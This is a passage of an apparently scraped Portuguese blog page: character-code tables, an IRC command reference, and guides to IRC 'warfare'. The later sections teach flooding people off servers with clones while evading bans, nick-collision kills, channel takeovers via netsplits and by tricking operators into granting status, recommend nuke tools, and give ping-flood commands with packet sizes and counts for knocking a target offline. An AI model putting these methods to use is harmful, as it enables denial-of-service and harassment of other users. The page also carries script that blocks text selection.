/>localiza no canto direito do próprio e digite os seguintes números para cada respectivo caracter: OBS:<br />Solta o ALT quando você acabar de digitar o último número da sequência...<br /><br />0140 - Œ 0138 - Š 0137 -‰ 0135 - ‡ 0134 - † 0131 - ƒ 0149 - o 00151 - - 0153 - ™ 0154 - š 0156 - œ 0157 - ? 0161 - ¡ 0162 - ¢<br />0163 - £ 0164 - ¤ 0165 - ¥ 0166 - ¦ 0167 - § 0169 - © 0171 - « 0176 - ° 0174 - ® 0177 - ± 0178 - ² 0179 - ³ 0181 - µ 0185 - ¹ 0186 - º<br />0187 - » 0188 - ¼ 0189 - ½ 0190 - ¾ 0191 - ¿ 0197 - Å 0198 - Æ 0200 - Ð 0215 - × 0216 - Ø 0229 - å 0230 - æ 0240 - ð 0247 - ÷<br />0248 - ø 0254 - þ - 0223-ß<br /><br /><br /><br />Caracteres em HTML<br /><br />☼-?_ض-?_♥-?_☺-? _▀-?_ ☻-? _▓-?<br /><br />_▒-?_ ░-?_♂-?_█-? _▌-?_◄-?_►-?_ ♪-?<br /><br /><br /><br />Mais códigos<br /><br /><br />♣ ♣<br />♦ ♦<br />♥ ♥<br />₪ ₪<br />₫ ₫<br />Č Č<br />č č<br />Ď Ď<br />ď ď<br />đ đ<br />ě ſ<br /> (espaço)<br />¹ ¹<br />» »<br />¼ ¼<br />½ ½<br />¾ ¾<br />¿ ¿<br />Å Å<br />Æ Æ<br />Ð Ð<br />× ×<br />Ø Ø<br />Þ Þ<br />ß ß<br />å å<br />æ æ<br />ð ð<br />÷ ÷<br />ø ø<br />þ þ<br />Ā Ā<br />ā ā<br />Ă Ă<br />ă ă<br />Ą Ą<br />ą ą<br />Ÿ Ÿ<br />  (cód. do ci)<br />¡ ¡<br />¢ ¢<br />£ £<br />¤ ¤<br />¥ ¥<br />¦ <br />¦ <br />§ §<br />¨ ¨<br />© ©<br />ª ª<br />« «<br />¬ ¬<br />® ®<br />¯ ¯<br />° °<br />± ±<br />² ²<br />³ ³<br />´ ´<br />µ µ<br />¶ ¶<br />· ·<br />¸ ¸<br />€ €<br /> <br />ƒ ƒ<br />„ „<br />… …<br />† †<br />‡ ‡<br />‰ ‰<br />Š Š<br />‹ ‹<br />Œ Œ<br />Ž Ž<br />‘ ‘<br />’ ’<br />“ “<br />” ”<br />• •<br />– –<br />— —<br />˜ ˜<br />™ ™<br />š š<br />› ›<br />œ œ<br />ž ž<br /><br />- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -<br /><br />Quando você envia uma mensagem, ela se guia ao seu servidor de Net, depois ao servidor de irc em cujo qual você<br />esta conectado, deste, e enviada a todos os servidores de irc que estão conectados ao seu e então, cada um desses<br />servidores, re-envia a mensagens aos seus usuários que puderem ter acesso a mesma.<br /><br />Comandos básicos:<br /><br />1-Entrar em canal(join) ............. : /join #canal<br />2-Sair de um canal(part) ............ : /part #canal<br />3-Mandar uma mensagens privada ............ : /mensagens $nick $mensagens<br />4-Sair do IRC deixando mensagens .......... : /quit $mensagens<br />5-Conectar em um server de IRC ...... : /server $servidor<br />6-Abrir pvt com a pessoa ............ : /query $nick<br />7-Fazer um ‘action’ ................. : /me $mensagens<br />8-Kickar um usuario ................. : /kick #canal $nick $mensagens<br />9-Dar OP Status a alguem ............ : /mode #canal +o $nick<br />10-Listar os canais de um servidor .. : /list<br />11-Trocar seu nick .................. : /nick $new_nick<br />12-Trocar o topico .................. : /topic #canal $topic<br />13-Ver info dos usuários ............ : /whois $nick<br />14-Mandar mensagens = digitar normalmente . : /say $mensagens<br />15-Gerar beep ....................... : /beep $numero $vezes<br />16-Apagar texto de uma janela ....... : /clear<br />17-Fechar pvt ....................... : /closemsg $nick<br />18-Informacoes de um canal logado ... : /channel<br />19-Fechar cliente (soft) ............ : /exit<br />20-Help sobre cmd ................... : /help $cmd<br />21-Pede horario ao servidor ......... : /time<br />22-Sair de todos canais ............. : /join 0<br /><br />Comandos avancados:<br /><br />1-Banir por nick ................. : /mode #canal +b nick!*@*.*.*.*<br />2-Banir por user ................. : /mode #canal +b *!user@*.*.*.*<br />3-Banir por ip ................... : /mode #canal +b *!*@ip<br />4-DeOP usuario ................... : /mode #canal -o $nick<br />5-Dar KILL (so para IRCops) ...... : /kill $nick $mensagens<br />6-Ver usuários com mesmo IP ...... : /who $nick<br />7-Ver info de usuario que saiu ... : /whowas $nick<br />8-Ver todos os usuários c/ acesso a +W : /who 0 w<br />9-Ver todos os usuarios c/ acesso a +I : /who 0 i<br />10-Ver todos os usuarios c/ acesso a +S : /who 0 s<br />11-Ver todos os usuarios c/ acesso a +O : /who 0 o (ircops)<br />12-Dar um Ping ................... : /ctcp $nick Ping<br />13-Dar um Finger ................. : /ctcp $nick Finger<br />14-Convidar alguem a um canal .... : /invite $nick #canal<br />15-Ver todos os usuarios on-line . : /who<br />16-Se tornar IRCop ............... : /oper $nick $password<br />17-Enviar arquivo via DCC ........ : /dcc send $nick $file<br />18-Abrir DCC Chat ................ : /dcc chat $nick<br />19-Ver quem esta em um canal ..... : /names #canal<br />20-Ficar away .................... : /away $msg<br />21-Sair do away .................. : /away<br />22-Trazer o ultimo cmd na janela . : /<br />23-Ver a ultima linha digitada ... : /!<br />24-Tocar .wav .................... : /wavplay $file<br />25-Fazer um ‘action’ (= /me) ..... : /action $msg<br />26-Mandar ‘action’ p/ todos canais : /ame $msg<br />27-Mandar msg a todos canais ..... : /amsg $msg<br />28-Mandar um ctcp ................ : /ctcp $nick<br />29-Carregar .ini ................. : /add -apuce $file<br />Obs(29): opcoes: a (alias), p(popup), u(user), c(cmds), e(events)<br />30-Liga/desliga auto op .......... : /auto [on|off]<br />31-Auto-op a um usuario .......... : /auto $nick<br />32-Auto-op a um IP ............... : /auto $ip<br />33-Abilita grupo do ‘remote’ ..... : /enable #grupo<br />34-Desabilita grupo do ‘remote’ .. : /disable #grupo<br />35-Verifica se usuario esta na net : /finger email<br />36-Liga/desliga ‘fast-send’ do DCC : /fsend [on|off]<br />37-Trocar fonte de letra ......... : /font<br />38-Liga/desliga gravacao canal/pvt : /log [on|off]<br />39-Mandar msg (= /msg) ........... : /notice $nick $msg<br />40-Liga/desliga ignore ........... : /ignore [on|off]<br />41-Ignorar um nick ............... : /ignore $nick $tipo<br />42-Ignorar um IP ................. : /ignore $ip $tipo<br />Obs(41/42): tipo: ctcp, pvt, msg.<br />43-Mandar msgs aos ops ........... : /omsg #canal $msg<br />44-Mandar msgs aos ops (= /omsg) . : /onotice #canal $msg<br />45-Liga/desliga ‘protect mode’ ... : /protect [on|off]<br />46-Proteger usuario .............. : /protect $nick<br />47-Proteger IP ................... : /protect $ip<br />Obs(46/47): NaO usar protecao em canais registrados<br />48-Liga/desliga ‘events’ ......... : /events [on|off]<br />49-Liga/desliga ‘remote’ ......... : /remote [on|off]<br />50-Executar soft ................. : /run $soft $parametros<br />51-Enviar msg procedida de som ... : /sound #canal $file $msg<br />52-Usar ‘Monologue’ para falar msg : /speak $msg<br />53-Manda ‘action’ a canal ........ : /describe #canal $msg<br />54-Controle interno de flood ..... : /flood $linhas $intervalo $pausa<br />55-Fazer um ‘File SERVER’ ........ : /fserver $nick 10 $dir_inicial<br />56-Responder DCC Chat ............ : /creq [ask|auto|ignore]<br />Obs(56):Ask:ele pergunta, auto:aceita, ignore:ignora.<br />57-Procurar DNS por nick ......... : /dns $nick<br />58-Procurar DNS por IP ........... : /dns $ip<br />59-Mostrar texto para usuario .... : /echo $nick $canal $msg<br />60-Liga/desliga ‘notify list’ .... : /notify [on|off]<br />61-Carregar um arquivo na tela ... : /play [#canal/$nick] $file<br />Obs: O comando /play tem uma particularidade: ele tambem pode ser utilizado para carregar um arquivo formato texto e interpretar suas linhas como comandos, basta acrescentar -c e, para que uma linha somente seja utilizada<br />radomicamente, -r; exemplo: /play -c -r #canal/$nick $file<br />62-Da OP se ninguem der .......... : /pop $tempo #canal $nick<br />63-Enviar cmd RAW p/ o servidor .. : /raw $cmd<br />64-Salvar arquivo .ini ........... : /save $file.ini<br />65-Tipo de receber DCC ........... : /sreq [ask|auto|ignore]<br />Obs(65):ask:pergunta se recebe, auto:recebe automaticamente, ignore:ignora o DCC.<br />66-Ligar o timer ................. : /timer $N_timer &repeticoes $intervalo $comandos<br />67-Abre U-Central (= /whois)...... : /uwho $nick<br />68-Liga/desliga tela p/ ver URLs . : /url [on|off]<br />69-Acrescenta usuario na lista ... : /auser -a $nivel $nick<br />70-Acrescenta usuario por email .. : /auser -a $email<br />71-Mudar nivel ................... : /dlevel $nivel $nick<br />72-Remover nicks de um nivel ..... : /flush $nivel<br />73-Remover nicks (= /flush) ...... : /rlevel $nivel<br />74-Lista usuarios de um nivel .... : /ulis $nivel<br />75-Obter info dos servidores ..... : /info<br />76-Listar os IRCops .............. : /stats o $server<br />77-Listar as K-lines ............. : /stats k $server<br />78-Listar as portas .............. : /stats l<br />79-Ver os administradores ........ : /admin<br />80-Ver o numero de usuarios ...... : /lusers<br />81-Ver quais servidores linkados . : /links<br />82-Checar ‘Timers’ ligados ....... : /groups -e<br />83-MOTD .......................... : /motd<br /><br /><br /><br />NOÇÕES PROFUNDAS:<br /><br />1-Hackers: Utilizam o IRC para derrubar pessoas atraves de floods, utilizam também para trocar softs de interesse aos<br />mesmos;<br /><br />2-Clones: Sao usuarios falsos utilizados pelos hackers para dar floods, podem ser detectados pelo IP, pois, possuem o<br />mesmo IP do hacker que o utiliza;<br /><br />3-LAG: Pode ocorrer quando um hacker coloca muitos clones em um determinado canal, pois, o servidor tera que<br />re-enviar as msgs a uma maior quantidade de usuarios;<br /><br />4-Flood: Ocorre quando um hacker tenta derrubar uma pessoa, se procede quando o hacker usa seus clones para<br />mandar repetidas msgs para uma determinada pessoa, como os clones sao muitos (nomalmente mais de 5) e a vitima,<br />somente 1, a vitima cai do servidor por flood, e os clones nao, porque cada um fez apenas um pouco de flood, a soma<br />desse flood e que ‘floode’ o usuario;<br /><br />5-IRCops: Vc pode partir esse termo em 3: 1-IRC; 2-OP; 3-COP! Os IRCops sao os responsaveis pelo patrulhamento do<br />IRC, sao eles que podem dar Kill, entrar em canais com senha, se tornar op mesmo que alguem nao lhe passe esse<br />status, e o organizador, na hierarquia, encontra-se acima dos Ops, Bots e ate mesmo de alguns masters;<br /><br />6-DCC: e por onde e possivel fazer a troca de arquivos, basta apenas enviar o arquivo e a pessoa aceitar (Get, Acept,<br />etc) o envio do mesmo;<br /><br />7-Fserver: e como se vc estivesse no DOS do outro usuario, e um servico que lhe permite ver, copiar, transferir,<br />executar, deletar os arquivos do outro usuario, dependendo do seu nivel de acesso ao mesmo;<br /><br />8-CTCP: e uma parte do Client-To-Client-Protocol (protocolo de transmissao cliente-cliente). Normalmente e utilizado<br />para conseguir informacoes sobre um usuario como nome real, email, soft cliente que voce esta utilizando. e utilizado<br />para fazer flood: Quando o cliente recebe um CTCP qualquer ele ira enviar a informacao solicitada, se for solicitada<br />muita informacao ao mesmo tempo, o servidor indicara que seu cliente esta fazendo flood e desconetara o mesmo;<br /><br />9-Kill: e um comando especial, que somente pode ser dado por um IRCop ou por um servidor de IRC. e aplicado<br />quando um usuario comeca a usar clones, quando um usuario esta pertubando o servidor, e, o mais comum: quando<br />ocorre um netsplit e ocorre que dois usuarios utilizam o mesmo nick; Em um caso como o ultimo citado, quem estiver<br />com o nick a mais tempo permanece e o outro usuario levara Kill;<br /><br />10-Conta Shell: Se constitui de um espaco (sub-diretorio) em disco no/do servidor. Costuma ser utilizada para a<br />colocacao de bots no IRC. A conta Shell permite o acesso ao sub-diretorio, mas, nao via acesso comum tipo DOS ou<br />Windows e sim pelo sistema Unix;<br /><br />11-Split: Costuma ocorrer em conjunto com o netsplit; e quando muitos usuarios saem de um determinado canal.<br />Costuma-se dizer que o usuario ‘caiu’ quando isso acontece;<br /><br />12-NetSplit: e a quebra de uma conexao entre dois servidores, quando isso ocorre, para um servidor, e como se todos<br />os outros usuarios se desconectassem do IRC.e detectavel: O usuario tem que setar o seu proprio modo para +s (/mode<br />$me +s), comando que server para receber mensagens do servidor; pronto, agora e so ficar prestando atencao no<br />status, quando chegar uma mensagem do servidor contendo o seguinte: ‘Net Break’ ou ‘Junction Break’ ou mesmo uma<br />mistura dessas duas mensagens, e a indicacao do rompimento de conexao de dois servidores, e o Netsplit ocorrendo;<br /><br />13-Utilizacao de ‘|’: Essa ‘barra’ e utilizada para comandos complexos que teem que ser digitados de um so vez; a<br />funcao dela seria de emular ao programa de IRC que um comando foi digitado, enviado e outro foi enviado logo a<br />seguir. Exemplo: O usuario gostaria de entrarem um canal, tocar um arquivo .wav e sair do canal, entao, o comando<br />deveria ser esse:/join #canal | /wavplay #canal exemplo.wav | /part #canal Ou seja, ‘|’ serve para separar comandos.<br /><br />----------------------------------------------------------------------<br /><br />O BOT<br /><br />Feitos pelos entendidos de IRC e por alguns hackers, tem a funcao de espionar um canal, dar OP ao seu criador,<br />proteger o criador e seus amigos, proteger canais, evitar flood, tirar clones e etc...<br /><br />Um bot tambem tem suas ‘brincadeiras’, exmeplo: voce pode criar no bot uma info-line cuja qual o bot colocara no<br />canal toda vez que voce entrar no mesmo.<br /><br />Abaixo, uma relacao de comandos para bots:<br /><br />1./msg bot hello .................... : registra usuario em bot<br />2./msg bot pass ............. : cria uma senha para o usuario<br />3./msg bot ident ............ : faz o bot lhe reconhecer se estiver conectado ao IRC de forma diferente da cadastrada<br />4./msg bot email ............ : registra seu e-mail no bot<br />5./msg bot info .............. : cria uma info-line<br />6./msg bot info none ................ : apaga info-line<br />7./msg bot who ......... : o bot mostrara quem esta no canal que ele organiza e suas respectivas info-lines<br />8./msg bot who .............. : o bot enviara as informacoes disponiveis sobre o usuario<br />9./msg bot notes index ...... : mostra o indice das msgs guardadas no bot para vc<br />10./msg bot notes read # .... : o bot mostra a msg para voce de numero #<br />11./msg bot notes read all .. : mostra todas as msgs<br />12./msg bot notes erase # ... : apaga msg de numero #<br />13./msg bot notes erase all . : apaga todas as msgs<br />14./msg bot notes TO .. : envia/deixa uma msg a um usuario via bot<br />15./msg bot help .................... : para obter ajuda do bot<br />16./msg bot op ....... : para o bot dar op-status a um usuario; o mesmo tem que estar cadastrado como OP no bot, coisa<br />que so os masters podem fazer<br /><br />Procedimentos: O indicado e que o usuario use dos comandos 1 ao 4, e 5, se quiser. E que o usuario se cadastre em<br />todos os BOTs de um servidor, principalmente os Bots daqueles canais que o usuario sempre costuma estar.<br /><br />Master: e o dono do Bot ou um usuario autorizado; e quem programa e quem habilita/desabilita outros masters, ops,<br />area de arquivos e outros.<br /><br />Linguagem: Costumam ser feitos em R.A.W., que e a programacao do IRC, quando Bots caseiros. Os Eggegrops Bots<br />sao feitos em Unix.<br /><br />Diferenca: Caseiros: e um Bot de teste, feito em R.A.W. e colocado em uso quando o usuario se conecta ao IRC;<br /><br />Egge: e um Bot trabalhado, feito em Unix, e colocado em uso pelo servidor ou usuario com conta Shell com<br />autorizacao e apoio dos mesmos.<br /><br />DCC: Constitui-se da via direta de comunicacao Master-Bot, Usuario-Bot e Bot-Bot, serve para pegar arquivos na ‘area<br />de arquivos’, e para, principalmente, utilizar a ‘parity-line’ do bot para conversar (chat) com outros usuarios que<br />tambem estejam conectados ao bot.<br /><br />----------------------------------------------------------------------<br /><br />MODOS DE UM CANAL:<br /><br />Um canal, ele tem que ter suas protecoes internas e automaticas, para nao depender somente dos ops e ircops. Esses<br />modos permitem ao canal, que ele seja privado (+p), invisivel (secreto)(+s), somente os Ops podem mudar o topico(+t),<br />nao recebera msgs de usuarios de fora do canal (+n), so’ entrarao usuarios chamados (invite) pelos ops (+i), podem ter<br />um numero limitado de usuarios (+l), ser um canal moderado, ou seja, so os Ops e quem tiver VOICE pode falar (+m) e<br />ate mesmo uma senha para vc entrar (+k)<br /><br />Setando os modos de um canal:<br />1-Privado ........................... : /mode #canal +p<br />2-Secreto ........................... : /mode #canal +s<br />3-So OPs mudam o topico ............. : /mode #canal +t<br />4-Nao receber msgs de fora .......... : /mode #canal +n<br />5-So usuarios ‘invitados’ ........... : /mode #canal +i<br />6-Numero limitado de usuarios ....... : /mode #canal +l $num<br />7-Canal moderado .................... : /mode #canal +m<br />8-Canal com senha ................... : /mode #canal +k $senha<br />9-Tirar algum dos modos ............. : /mode #canal -modo_escolhido<br /><br />----------------------------------------------------------------------<br /><br />MODOS DO USUARIO:<br /><br />Esses modos do usuario sao mais para protecao; ele pode ficar invisivel ao servidor, pode receber as msgs do servidor,<br />cujas quais indicam quando um servidor caiu ou tentou reconctar, ver as ‘Walls-OPs’, ou seja, as msgs enviadas de Ops<br />e Ircops a outros Ops ou IRCops. E ate mesmo dar VOICE a um usuario em um canal.<br /><br />Setando os modos de um usuario:<br />1-Invisivel .................... : /mode $nick +i<br />2-Server msgs .................. : /mode $nick +s<br />3-Wall-ops ..................... : /mode $nick +w<br />4-Voice ........................ : /mode #canal +v $nick<br /><br />----------------------------------------------------------------------<br /><br />OUTRAS DEFINICOES<br /><br />Take Over: Tambem conhecido como ‘Take Down’; e a tomada de um canal por um usuario.Como proceder para tomar<br />um canal: Deve-se setar os modos do usuario para receber as mensagens do servidor. Quando houver uma ‘quebra’ de<br />conexao, o usuario devera se conectar ao servidor que desconectou-se e entrar no canal desejado, que,<br />provavelmente, nao tera um unico sequer usuario, tornando-se assim, Operador. Quando o servidor reconectar-se a<br />rede, o usuario precisa apenas tirar o OP-Status dos Operadores pela outra conexao. Como evitar: Quando ocorrer uma<br />‘quebra’ de conexao, o Operador de canal deve estar atento para retirar o OP-Status de todos os Operadores assim<br />logados no servidor que desconectou-se.<br /><br />Emocticons: Sao os simbolos do IRC, atraves dos quais vc pode expressar sue estado/sentimento sobre algo. Sao<br />comumente utilizados em mails. Os principais: (Nesta pagina existe uma secao especial repleta com mais de 100<br />emoticons)<br /><br />:) ................................ : Alegre<br />:( ................................ : Triste<br />:~( ............................... : Chorando<br />:`( ............................... : Chorando (2)<br />:~) ............................... : Emocionado<br />;) ................................ : Piscando<br />:* ................................ : Beijo<br />:*) ............................... : Cheiro<br />}:-{ .............................. : P. da vida<br />q:^P .............................. : Bone e com a lingua de fora<br />:P ................................ : Sorrindo<br />:O ................................ : Impressionado<br />:| ................................ : Sem comentarios<br />:X ................................ : Cala a boca; calado<br /><br />----------------------------------------------------------------------<br /><br />SRIPTS:<br /><br />Os scripts sao um conjunto de comandos que disponibilam alguns recursos, como por exemplo: derrubar os outros por<br />flood, controlar um canal automaticamente como se fosse um bot ou um usuario dedicado ao mesmo, podem servidor<br />para derrubar, gerenciando os clones a fim de que eles executem a ordem estabelecida pelo script, pode ignorar<br />automaticamente alguem que esteja tentando lhe derrubar, pode usar o recurso de protecao do IRC, pode espionar um<br />canal, pode bisbilhotar um pvt. Enfim, pode tudo o que existe no IRC. Depende apenas de como for feito e a<br />necessidade dessa pessoa de controle de IRC.<br /><br />1-O que sao: Sao um conjunto de comandos com funcoes especificas e que ganham pode trabalhando em conjunto;<br /><br />2-Como fazer: Basta entender de IRC e ter paciencia de fazer algo que lhe interesse a ponto suficiente de montar seu<br />proprio script;<br /><br />3-Quem faz: Quem tem paciencia e/ou que necessita de um script especifico ou com algum caracteristica nao<br />encontrada em outro script;<br /><br />4-Os melhores disponiveis: Vai depender de cada um, eu particularmente, aprecio o Dusk para protecao e para<br />ataque/defesa em conjunto, prefiro o Nahrck, o Dusk e bom, e tambem o Smart Nark, recomendo para os inciantes o<br />Avalanche Script, pegue em http://surf.to/avscript<br /><br />----------------------------------------------------------------------<br /><br />DDE:<br /><br />1-O que e? DDE e o Intercambio Dinamico dos Dados (Dynamic Data Exchange), e um dos 3 mecanismos de<br />comunicacao entre processos suportados dentro do Windows. Os outros dois sao a Area de Transferencia e a memoria<br />compartilhada nas bibliotecas de ligacao dinamica. O DDE esta baseado no sistema de mensagem embutido no<br />Windows. Dois programas Windows ‘dialogam’entre si enviando mensagens de um para o outro. Esses dois programa<br />sao conhecidos como ‘servidor’ e ‘cliente’. O Serdivor de DDE e’ o programa que tem acesso aos dados que poderao<br />ser uteis a outros programas Windows. O Cliente do DDE e’ o programa que obtem esses dados do servidor.<br /><br />2-Qual a utilizacao de DDE? O DDE e' muito usado com bots/clones... tipo: quando eu colocar um frase, os outros clones<br />executariam o que estao programados para fazer.<br /><br />-----------------------------------------------------------------------<br /><br /><br /><br />Guerra Básica<br /><br />Essa seção é dedicada àqueles que são novos na guerra em IRC. Esse texto vai lhes ensinar as bases do flood e colisão<br />de nick, incluindo alguns tópicos que você verá adiante.<br /><br /><br />1. Flood<br /><br />Essa é uma antiga, elegante e efetiva maneira de pegar quem você odeia. O que o flood faz com que a vítima mande<br />muita informação para um servidor, que desconecta ela. Para tal são necessários clones. Clones são outras conexões<br />com o servidor. Copias do seu IRC client. O flood script, manda os clones enviarem muita informação simultaneamente<br />para a pessoa. Quando o IRC client dele tenta processar essa informação, manda muitos dados para o servidor, que<br />desconecta ela.<br /><br />Existem muitos tipos de floods, escolher o certo é importante. Bons Flood são os DCC e CTCP. Os que não fazem nada<br />são os Text, Notice e Invite floods. Bem como os Crap floods que não fazem nada mas fazem parecer. Outro fator<br />importante é números de clones que você vai usar. Para dar flood em uma única pessoa, a melhor aposta que você<br />pode fazer são 3 clones CTCP em floods como Clientinfo, Userinfo ou Version. ECHO floods são extremamente<br />poderosos, porém requerem mais clones. DCC floods são muito efetivos também. Existem 4 tipos de DCC flood<br />diferentes. São eles: DCC Chat flood, que manda toneladas de janelas de DCC chat para a pessoa; DCC send flood,<br />manda toneladas de DCC send (Se os DCCs forem aceitos automaticamente pode-se encher o HD do condenado de<br />arquivos desagradáveis; DCC Resume e Accept são outros dois tipos. Esses últimos foram a melhor forma de flood<br />encontrada, mas IRC clients não os suportam mais, tornando eles fúteis.<br /><br />Quando for usar clones ou fazer floods você deve ter cuidado para não ser pego. Isso acarretaria em um K-line. Para<br />prevenir que isso aconteça, lembre: Não use clones se não for absolutamente necessário, por que arriscar? Destrua<br />seus clones quando o objetivo for alcançado; Use "nick changing" clones pra dar flood. Todos sabem sobre o /whois<br />para ver informações da pessoa, mas a maioria não sabe sobre o /whowas. Assim, se o clone mudar de nome depois<br />do flood, a vítima nunca vai saber quem o fez. NUNCA dê floods em canais com IRCops ou Network admins! Isso,<br />certamente, vai lhe custará um K-line. Se for possível, faça o flood junto de um amigo, quanto menos clones por IP<br />menor a chance de você ser pego.<br /><br /><br /><br />2. Colisão de Nicks<br /><br />A colisão de Nicks ocorre quando duas pessoas estão usando o mesmo nick. Como os servidores não podem suportar<br />isso, as pessoas são desconectadas. Existem dois tipos de colisão de Nicks. A colisão por split server e a por lag. A por<br />split server acontece quando você põe um bot dentro do splited server, com o nick da pessoa que você quer matar. No<br />netmerge, as duas morrem. Esse método não funciona na undernet. O outro método é chamado de colisão por lag. Esse<br />só pode ser feito quando a pessoa muda de nick. O que acontece é isso: 1. O Lamer muda de nick. 2. O script vê e<br />manda um sinal para o bot que está no servidor laged e esse muda o seu nick para o novo nick da vítima. 3. Em uns<br />poucos segundos de lag o servidor em que o bot está dá um kill na outra pessoa, porque acha que o seu bot pegou o<br />nick primeiro. Essa não é um bom método para um takeover, mas é divertido ver um bando de gente recebendo kill<br />num grande canal.<br /><br /><br />-------------------------------------------------------------<br /><br /><br />Tomando Canais<br /><br />Tomar canais é uma boa maneira de mostrar seu poder ou se vingar de um inimigo. É o motivo básico das guerras de<br />IRC, controle de território. Essa seção contém informações úteis para fazer-lo de várias maneiras.<br /><br /><br />1. Flood no Canal<br /><br />Esse método é divertido, mas a parte mais difícil é que cada vez mais pessoas estão ficando imunes ao flood.<br />Conseguindo dar flood em todas as pessoas o resto é fácil. Pegue todos os clones que você usou e descarte-os. Depois<br />entre no canal e pegue OP. Contudo se seu não cair temos um dilema. Um canal sem OP e com duas pessoas o<br />querendo. O que você faz? Corra para um netsplit!<br /><br /><br />2. Netsplit<br /><br />Um canal sem OP é um alvo fácil para um netsplit. O que você faz é o seguinte: Quando achar um servidor splited<br />conecte-se a ele. Se não houver ninguém no canal você ganha OP só entrando no canal. Com o OP, basta esperar por<br />um netmerge e quando todos estiverem no canal novamente você vai ser o único OP, podendo fazer o que quiser!<br /><br />Fazer isso com um canal que já tem OPs não é fácil. Na Undernet é IMPOSSÍVEL. Mas isso não quer dizer que você não<br />possa se divertir. Pegue o OP e espere um netmerge. Quando as pessoas voltarem ao canal, rode um desync. O que ele<br />faz, é mudar as banlists, esvazie elas e mude os modos do canal. Isso realmente acaba com os servidores que já estão<br />mal. Eles ficam tentando colocar o canal nos modos normais, isso causa um lag terrível que leva o canal à ruína. Isso<br />acaba também com os bots que não estão splited. Isso pode causa-los flood ou crash. Se você não pode hackear os<br />OPs pelo menos tem a sua vingança. Essa brincadeira pode levar o canal a ficar mal por uma meia hora algumas<br />vezes.<br /><br />Se você é sortudo o suficiente para estar numa rede lamer que ainda não tem proteção anti-nethack, você poderá<br />tomar canais com netsplit, bastando ter o script certo. 1. Você precisa de um servidor splitado sem proteção. O que<br />acontece é que quando o servidor quiser dar OP para alguém ele vai, na verdade, deOPar essa pessoa. 2. Outra boa<br />maneira de fazer isso é tendo como dar um kickban em cada pessoa que entrar no canal por um netmerge. Isso<br />combinado com o netsplit protection fará você tomar o canal depois de uma simples batalha.<br /><br /><br />3. Pedindo ao OP<br /><br />Essa é a maneira mais facil de tomar um canal. É efetiva e legal, significa eles te darem OP e você deOPar todos eles.<br />Os IRCops não podem fazer nada contra isso. A melhor maneira de ganhar OP é ficar num canal um pouco, sendo<br />amável e prestativo (essa é a parte difícil). Aí diga "Ei, você acha que pode me OPar? Sou confiavel. Eu tenho te<br />ajudado desde que cheguei". Depois o script cuida de deOpar todos em massa, isso é fácil. O que o script vai fazer é<br />óbvio: logo quando você ganhar o OP ele vai tirar o OP de todos os outros, com exceção de você. Eles nem vão ter<br />tempo de reagir! Depois de estar sozinho como OP do canal você poderá fazer o que quiser, trancar o canal, kickar<br />e/ou banir todo mundo, tudo que der na telha. O canal é seu agora!<br /><br /><br /><br />------------------------------------------------------------<br /><br /><br />Guerra Avancada<br /><br />Os scripts de guerra estão ficando cada vez mais avançados. Contudo, os servidores e os IRCops também estão ficando<br />cada vez melhores. Muitos servidores incorporam o Clone Detection. Isso significa listar as pessoas comparando os IP's<br />e notificando os IRCops. Isso pode tornar impossível fazer um número de clones suficientes para dar um flood em<br />alguém. Alguns servidores tem proteção contra táticas de netsplit takeover. Esse tipo de coisa pode deter o hacking<br />contra OPs durante um netsplit, permitindo somente tomar canais que não tenham OP. Anti Collide é também usado<br />em muitos servidores. Fazendo com que os dois usuários sejam mortos numa colisão por troca de nick. Se alguém<br />quiser te ferrar você vai deixar de brigar só porque não pode usar clones e etc??? NÃO!<br /><br /><br />1. Nuke<br /><br />Nuke é uma grande arma para tirar alguém de IRC rápido! Funciona assim: O programa de nuke manda informação<br />para pessoa no servidor e ela é ferrada por eles, causará erros como "dead Socket", "connection refused", "eof from<br />client" e "machine is not on the network".<br /><br />Para usar o nuke é preciso primeiro um modem rápido, 28.8 ou melhor. Você também precisa do Trumpet© Winsock.<br />Programa dial up que se comunica rapidamente com o modem. Esse programa pode ser facilmente encontrado na<br />web. Agora só é preciso de um programa de Nuke. Eu recomendo o Winuke 4 by CHAOS INC. ou Wnewk para maquinas<br />windows, ou se você usa um mac, MAC NUKE. Depois de pegar esses programas, é fácil ter uma vingança, tomar<br />canais, e matar gente rapidamente.<br /><br /><br />2. Bombas ICMP<br /><br />ICMP é uma maneira extremamente poderosa de tirar a pessoa , não só de IRC, mas de sua conexão com a Internet.<br />Funciona dessa maneira: ela manda mensagens ICMP, em uma taxa muito alta de velocidade, causando barulho na<br />linha, e modem lag. Causa tanto lag, que seu ping aumenta terrivelmente e o joga pra fora do IRC server.<br /><br />Para usar o ICMP você precisa de um Unix Shell account. Por que? Porque para usar o ICMP efetivamente você precisa<br />de mais do que um modem pode oferecer. Você precisa de uma T1, pelo menos. Existem muitos programas de ICMP<br />para Windows disponíveis, mas eles não trabalham muito bem. É a velocidade que importa nessa hora.<br /><br />Aqui estão duas formas de usar ICMP num Unix shell:<br /><br />ping -s (ip address) (packet size) (# of packets)<br />ping -s (packet size) -c (# of packets) <-f> (ip address)<br /><br />(IP address) é o *!*@seja.la.oque.for<br />(packet size) é o tamanho de cada pacote a mandar, tente 30kb<br />(# of packets) é quantos pacotes mandar 3000 é um bom número<br />-f é opcional em segundo, e manda pacotees a 20/seg<br /><br /><br /><br />3. Botnet/Floodnet<br /><br />É cada vez mais difícil usar clones sem ser pego. Você precisa de uma maneira de usar o flood sem ser detectado.<br />Como fazer isso? Floodnet. Existem duas tipos diferentes de Floodnet. O primeiro é com Eggdrop bots, esses botnets<br />são compreendidos como eggdrops ligados, e tem um script de flood comum. Existem botnets com muitas centenas de<br />ligações. É muito difícil parar o flood deles. A outra maneira, é usar scripts individuais. Os scripts têm comandos<br />comuns, e permitem que usuários com o mesmo script de se liguem, para juntos combinarem seus clones. Existem<br />vantagens e desvantagens dos dois. As vantagens dos botnets é que estão sempre online porque estão em um Shell.<br />Mas as desvantagens é que não são tão dinâmicos quanto um clone floodnet.<br /><br />BODY { SCROLLBAR-BASE-COLOR: #000080 } BODY { SCROLLBAR-ARROW-COLOR: #0000FF } //script from www.argnet.tk function blockError(){return true;} window.onerror = blockError; function disableselect(e) { return false } function reEnable() { return true } //if IE4+ document.onselectstart=new Function ("return false") //if NS6 if (window.sidebar) { document.onmousedown=disableselect document.onclick=reEnable } </span>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-7223422565314932992010-08-03T12:17:00.000-07:002010-08-03T12:18:14.930-07:00Unix<span style="font-weight:bold;">Introdução<br /><br />O 